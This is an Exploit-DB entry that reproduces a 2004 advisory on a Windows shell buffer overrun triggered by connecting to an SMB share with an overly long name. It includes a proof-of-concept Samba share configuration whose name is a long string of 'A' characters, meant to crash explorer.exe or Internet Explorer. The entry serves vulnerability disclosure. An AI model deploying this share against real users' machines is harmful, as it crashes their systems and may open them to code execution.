Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun

EDB-ID:

24051




Platform:

Windows

Date:

2004-04-25


source: https://www.securityfocus.com/bid/10213/info

Microsoft Windows operating systems have been reported to be prone to a remotely exploitable buffer overrun condition. 

This issue is exposed when a client attempts to connect to an SMB share with an overly long name. This may cause explorer.exe or Internet Explorer to crash but could also potentially be leveraged to execute arbitrary code as the client user.

[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung